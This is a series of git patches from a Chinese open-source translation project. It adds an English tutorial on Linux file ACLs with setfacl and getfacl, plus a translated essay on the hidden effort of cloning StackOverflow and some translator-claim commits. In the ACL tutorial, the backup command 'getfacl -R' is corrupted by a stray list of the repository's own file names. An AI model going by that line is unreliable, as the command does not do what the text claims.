但当很多玩家出现在屏幕中时就变得很垃圾了。 + +实验然后看看哪些配置最适合你的系统。这完全取决于你的硬件和你的系统配置。 + +### 最后结语 + +从未发不过 Linux 版的魔兽世界,但它在 Wine 上已经运行很多年了。 事实上, 它几乎一直都工作的很好。 甚至有传言说暴雪的开发人员会在 Wine 上测试以保证它是有效的。。 + +虽然有这个说法,但后续的更新和补丁还是会影响到这个古老的游戏, 所以请随时做好出问题的准备。 不管怎样, 就算出问题了,也总是早已有了解决方案, 你只需要找到它而已。 + + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-play-world-of-warcraft-on-linux-with-wine + +作者:[Nick Congleton][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org +[1]:https://linuxconfig.org/images/wow-wine-staging.jpg +[2]:https://linuxconfig.org/images/wow-wine-corefonts.jpg +[3]:https://linuxconfig.org/images/wow-bnet.jpg +[4]:https://linuxconfig.org/images/wow-api.jpg +[5]:https://linuxconfig.org/images/wow-settings.jpg +[6]:https://linuxconfig.org/installing-wine +[7]:https://linuxconfig.org/configuring-wine-with-winetricks +[8]:https://appdb.winehq.org/objectManager.php?sClass=version&iId=28855&iTestingId=98594 +[9]:http://us.battle.net/en/app/ From ab9e6f489389ae9612a0f3ede8c078127fcac2e5 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 15 Dec 2017 16:18:22 +0800 Subject: [PATCH 0588/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Allo?= =?UTF-8?q?w/Permit=20User=20To=20Access=20A=20Specific=20File=20or=20Fold?= =?UTF-8?q?er=20In=20Linux=20Using=20ACL?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...cific File or Folder In Linux Using ACL.md | 265 ++++++++++++++++++ 1 file changed, 265 insertions(+) create mode 100644 sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md diff --git a/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md b/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md new file mode 100644 index 0000000000..5cf0d8b577 --- /dev/null +++ b/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md @@ -0,0 +1,265 @@ +tranlating by lujun9972 +How To Allow/Permit User To Access A Specific File or Folder In Linux Using ACL +====== +When you are come to file or folder permission part, you may first look owner/group/others permission. This can be done through chmod, chown, etc., commands. + +Files and directories have permission sets such as owner (owner or user of the file), group (associated group) and others. However, these permission sets have limitations and doesn't allow users to set different permissions to different users. + +By default Linux has following permission set for files & folders. + +`Files` -> 644 -> -rw-r-r- (User has Read & Write access, Group has Read only access, and Others also has Read only access) +`Folders` -> 755 -> drwxr-xr-x (User has Read, Write & Execute access, Group has Read & Execute access, and Others also has the same access) + +For example: By default users can access & edit their own home directory files, also can access associated group files but they can't modify those since group doesn't has write access and it's not advisable to permit group level. Also he/she can't access other users files. In some case multiple users want to access the same file, what will be the solution? + +I have user called `magi` and he wants to modify `httpd.conf` file? how to grant since it's owned by root user. Thus, Access Control Lists (ACLs) were implemented. + +### What Is ACL? + +ACL stands for Access Control List (ACL) provides an additional, more flexible permission mechanism for file systems. It is designed to assist with UNIX file permissions. ACL allows you to give permissions for any user or group to any disc resource. setfacl & getfacl commands help you to manage AcL without any trouble. + +### What Is setfacl? + +setfacl is used to sets Access Control Lists (ACLs) of files and directories. + +### What Is getfacl? + +getfacl - get file access control lists. For each file, getfacl displays the file name, owner, the group, and the Access Control List (ACL). If a directory has a default ACL, getfacl also displays the default ACL. + +### How to check whether ACL is enabled or not? + +Run `tune2fs` command to Check whether ACL is enabled or not. +``` +# tune2fs -l /dev/sdb1 | grep options +Default mount options: (none) + +``` + +The above output clearly shows that ACL is not enabled for `/dev/sdb1` partition. + +If acl is not listed then you will need to add acl as a mount option. To do so persistently, change the `/etc/fstab` line for `/app` to look like this. +``` +# more /etc/fstab + +UUID=f304277d-1063-40a2-b9dc-8bcf30466a03 / ext4 defaults 1 1 +/dev/sdb1 /app ext4 defaults,acl 1 1 + +``` + +Or alternatively, you can add this to the filesystem superblock by using the following command. +``` +# tune2fs -o +acl /dev/sdb1 + +``` + +Now, change the option in the current run-time without interruption by running the following command. +``` +# mount -o remount,acl /app + +``` + +Then run the tune2fs command again to see acl as an option. +``` +# tune2fs -l /dev/sdb1 | grep options +Default mount options: acl + +``` + +Yes, now i can see the ACLs option on `/dev/sdb1` partition. + +### How to check default ACL values + +To check the default ACL values for a file or directory, use the `getfacl` command followed by `/path to file` or `/path to folder`. Make a note, when you run getfacl command on non ACLs file or folder, it wont shows additional user and mask parameter values. +``` +# getfacl /etc/apache2/apache2.conf + +# file: etc/apache2/apache2.conf +# owner: root +# group: root +user::rw- +group::r-- +other::r-- + +``` + +### How to Set ACL for files + +Run the setfacl command with below format to set ACL on the given file. In the below example we are going to give a `rwx` access to `magi` user on the `/etc/apache2/apache2.conf` file. +``` +# setfacl -m u:magi:rwx /etc/apache2/apache2.conf + +``` + +**Details :** + + * **`setfacl:`** Command + * **`-m:`** modify the current ACL(s) of file(s) + * **`u:`** Indicate a user + * **`magi:`** Name of the user + * **`rwx:`** Permissions which you want to set + * **`/etc/apache2/apache2.conf:`** Name of the file + + + +Run the command once again to view the new ACL values. +``` +# getfacl /etc/apache2/apache2.conf + +# file: etc/apache2/apache2.conf +# owner: root +# group: root +user::rw- +user:magi:rwx +group::r-- +mask::rwx +other::r-- + +``` + +Make a note : If you noticed a plus (+) sign after the file or folder permissions then it's ACL setup. +``` +# ls -lh /etc/apache2/apache2.conf +-rw-rwxr--+ 1 root root 7.1K Sep 19 14:58 /etc/apache2/apache2.conf + +``` + +### How to Set ACL for folders + +Run the setfacl command with below format to set ACL on the given folder recursively. In the below example we are going to give a `rwx` access to `magi` user on the `/etc/apache2/sites-available/` folder. +``` +# setfacl -Rm u:magi:rwx /etc/apache2/sites-available/ + +``` + +**Details :** + + * **`-R:`** Recurse into sub directories + + + +Run the command once again to view the new ACL values. +``` +# getfacl /etc/apache2/sites-available/ + +# file: etc/apache2/sites-available/ +# owner: root +# group: root +user::rwx +user:magi:rwx +group::r-x +mask::rwx +other::r-x + +``` + +Now, all the files and folders having ACLs values under `/etc/apache2/sites-available/` folder. +``` +# ls -lh /etc/apache2/sites-available/ +total 20K +-rw-rwxr--+ 1 root root 1.4K Sep 19 14:56 000-default.conf +-rw-rwxr--+ 1 root root 6.2K Sep 19 14:56 default-ssl.conf +-rw-rwxr--+ 1 root root 1.4K Dec 8 02:57 mywebpage.com.conf +-rw-rwxr--+ 1 root root 1.4K Dec 7 19:07 testpage.com.conf + +``` + +### How to Set ACL for group + +Run the setfacl command with below format to set ACL on the given file. In the below example we are going to give a `rwx` access to `appdev` group on the `/etc/apache2/apache2.conf` file. +``` +# setfacl -m g:appdev:rwx /etc/apache2/apache2.conf + +``` + +**Details :** + + * **`g:`** Indicate a group + + + +For multiple users and groups, just add `comma` between the users or group like below. +``` +# setfacl -m u:magi:rwx,g:appdev:rwx /etc/apache2/apache2.conf + +``` + +### How to remove ACL + +Run the setfacl command with below format to remove ACL for the given user on the file. This will remove only user permissions and keep `mask` values as read. +``` +# setfacl -x u:magi /etc/apache2/apache2.conf + +``` + +**Details :** + + * **`-x:`** Remove entries from the ACL(s) of file(s) + + + +Run the command once again to view the removed ACL values. In the below output i can see the `mask` values as read. +``` +# getfacl /etc/apache2/apache2.conf + +# file: etc/apache2/apache2.conf +# owner: root +# group: root +user::rw- +group::r-- +mask::r-- +other::r-- + +``` + +Use `-b` option to remove all ACLs associated to a file. +``` +# setfacl -b /etc/apache2/apache2.conf + +``` + +**Details :** + + * **`-b:`** Remove all extended ACL entries + + + +Run the command once again to view the removed ACL values. Here everything is gone and there is no mask value also. +``` +# getfacl /etc/apache2/apache2.conf + +# file: etc/apache2/apache2.conf +# owner: root +# group: root +user::rw- +group::r-- +other::r-- + +``` + +### How to Backup and Restore ACL + +Run the following command to backup and restore ACLs values. To take a backup, navigate to corresponding directory and do it. + +We are going to take a backup of `sites-available` folder. So, you have to do like below. +``` +# cd /etc/apache2/sites-available/ +# getfacl -R 20171202 docker - Use multi-stage builds.md comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE published README.md sign.md sources translated 选题模板.txt 中文排版指北.md > acl_backup_for_folder + +``` + +To resote, run the following command. +``` +# setfacl --restore=/etc/apache2/sites-available/acl_backup_for_folder +``` + +-------------------------------------------------------------------------------- + +via: https://www.2daygeek.com/how-to-configure-access-control-lists-acls-setfacl-getfacl-linux/ + +作者:[Magesh Maruthamuthu;Steven M. Dupuis][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.2daygeek.com From e022c33b773564e1e3b19e25864db24a61079809 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Fri, 15 Dec 2017 16:20:05 +0800 Subject: [PATCH 0589/1627] Translating by qhwdw --- .../tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md b/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md index 7a9b6e817c..42a3363ce3 100644 --- a/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md +++ b/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md @@ -1,3 +1,4 @@ +Translating by qhwdw # LEAST PRIVILEGE CONTAINER ORCHESTRATION @@ -172,3 +173,5 @@ via: https://blog.docker.com/2017/10/least-privilege-container-orchestration/ [10]:https://blog.docker.com/tag/least-privilege-orchestrator/ [11]:https://blog.docker.com/tag/tls/ [12]:https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/ + + From 75c802f3a76be0edbce325886172e4d053a74c7e Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Fri, 15 Dec 2017 19:23:17 +0800 Subject: [PATCH 0590/1627] Update 20171214 Bash Scripting- Learn to use REGEX (Basics).md --- .../tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md b/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md index 2ce8dc6627..f6a32b0153 100644 --- a/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md +++ b/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md @@ -1,3 +1,4 @@ +translating by kimii Bash Scripting: Learn to use REGEX (Basics) ====== Regular expressions or regex or regexp are basically strings of character that define a search pattern, they can be used for performing 'Search' or 'Search & Replace' operations as well as can be used to validate a condition like password policy etc. From 59af9d1d0ec956201a5b201b1d3a25583766203c Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 15 Dec 2017 19:43:30 +0800 Subject: [PATCH 0591/1627] translating by lujun9972 --- ...ser To Access A Specific File or Folder In Linux Using ACL.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md b/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md index 5cf0d8b577..30e70fe341 100644 --- a/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md +++ b/sources/tech/20171213 How To Allow-Permit User To Access A Specific File or Folder In Linux Using ACL.md @@ -1,3 +1,4 @@ +translating by lujun9972 tranlating by lujun9972 How To Allow/Permit User To Access A Specific File or Folder In Linux Using ACL ====== From fff734bf77cc3e0793ce4a4caa819ab561ab006d Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 20:08:03 +0800 Subject: [PATCH 0592/1627] =?UTF-8?q?=E6=A0=A1=E5=AF=B9=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...The One in Which I Call Out Hacker News.md | 67 ------------------- ...The One in Which I Call Out Hacker News.md | 58 ++++++++++------ 2 files changed, 38 insertions(+), 87 deletions(-) delete mode 100644 20090701 The One in Which I Call Out Hacker News.md diff --git a/20090701 The One in Which I Call Out Hacker News.md b/20090701 The One in Which I Call Out Hacker News.md deleted file mode 100644 index 30e796cb8a..0000000000 --- a/20090701 The One in Which I Call Out Hacker News.md +++ /dev/null @@ -1,67 +0,0 @@ -因为这个,我找 Hacker News 期刊理论了一番 - -实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? -不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员永远的乐观主义。 -- 出自 Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 - -指责开源软件总是离奇难用已经不是一个新论点了。这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? - -在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现一个StackOverflow可以简单到搞笑的程度,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 - -秉承着自由讨论的精神,我们来假设一个场景。你在思考之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词(也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少80个小时的时间。 - -或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭源 StackOverflow 代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 - -好的,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow 大部分的功能呢?这总归会容易很多了吧* - -好的,问题是什么是大部分功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统来显示大家对某个答案是赞同还是反对。只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 -与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的那个超棒的编辑器 )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 - -但是如果你实现了以上所有功能,可以说你就已经把要做的都做完了。 - -除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现回答的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移冷却下去沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 slashdot,reddit 或是 StackOverflow 这些动作影响到。 - -在这之后!你会以为你基本已经大功告成了! - -...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的CSS设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 - -那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? - -正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也正是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。因为看似简单的功能,做起来却总是布满荆棘。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码 - - -create table QUESTION (ID identity primary key, - TITLE varchar(255), --- 为什么我知道你认为是 255 - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - USER integer references USER(ID)); -create table RESPONSE (ID identity primary key, - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - QUESTION integer references QUESTION(ID)) - - -如果你让这些开发者去实现 Stack Overflow,进入他脑海中的就是上面的两个SQL表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 - -但这种简单的实现却远远不能体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 Stackoverflow 的源码之后,我得以印证了自己的想法,Stackoverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后各种精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的很少会去考虑到产品背后的打磨和雕琢工作,因为他们认为这些打磨和雕琢都是偶然的,甚至是无足轻重的。 - -这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 Stack Overflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遇到种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 正在使用的流程和方案:即实现一个通用的机制, 以便那些可以自如使用基于 Python 或 Php 或其他语言的 的系统API的人可以轻松的定制化他们自己的 Badge。而且老实说,PHP 和 Python 比任何可能的 GUI 接口要 好用和强大得多,谁还会考虑 GUI 的方案呢?(出自开源开发者的想法) - -同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计 - 即要求用户必须拥有一个 OpenID 并知道如何使用它 - 在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 - - -开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低之后的售后维护支持成本一样,懂行的消费者也会想要在他们购买这些产品之前就确保产品好用,以便他们不需要在使用的时候不知所措,然后去打电话给售后服务来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 - -这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,Django,PostgreSQL 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而且即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 -相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及尝试给哪个新的用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也只是一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项正是在这种基础构架的开发和创新上,这也是驱使开发者贡献开源的最本真的动力。 - - -所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 - -via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ - -作者:Benjamin Pollack 译者:hopefully2333 校对:yunfengHe - -本文由 LCTT 原创编译,Linux中国 荣誉推出 diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index f2b06ae23a..67b4c2ea96 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -1,24 +1,25 @@ -因为这个,我找 Hacker News 期刊理论了一番 -============================================================ +# [因为这个,我找 Hacker News 期刊理论了一番][14] -> 实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? -不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。 -- 出自 Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 -指责开源软件总是离奇难用已经不是一个新论点了。这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? +> “实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? +不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。” +> +> — 出自 [Owen Astrachan][1] 教授于 2004 年 2 月 23 日在 [CPS 108][2] 上的讲座 -在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现和一个和 StackOverflow 一样的系统可以简单到爆,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 +[指责开源软件总是离奇难用已经不是一个新论点了][5]; 这样的论点之前就被很多比我更为雄辩的人提及过, 甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? -秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 (也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 +在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。 + +秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 -好的,我知道你在听到这些假设的时候已经开始觉得泄气了。你在想,如果不是全部实现,而只是实现 StackOverflow 大部分的功能呢?这总归会容易很多了吧。 +_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow **大部分** 的功能呢?这总归会容易很多了吧。* -好的,问题是什么是大部分功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 -与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的那个超棒的编辑器 )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 +好的,问题是什么是 "大部分" 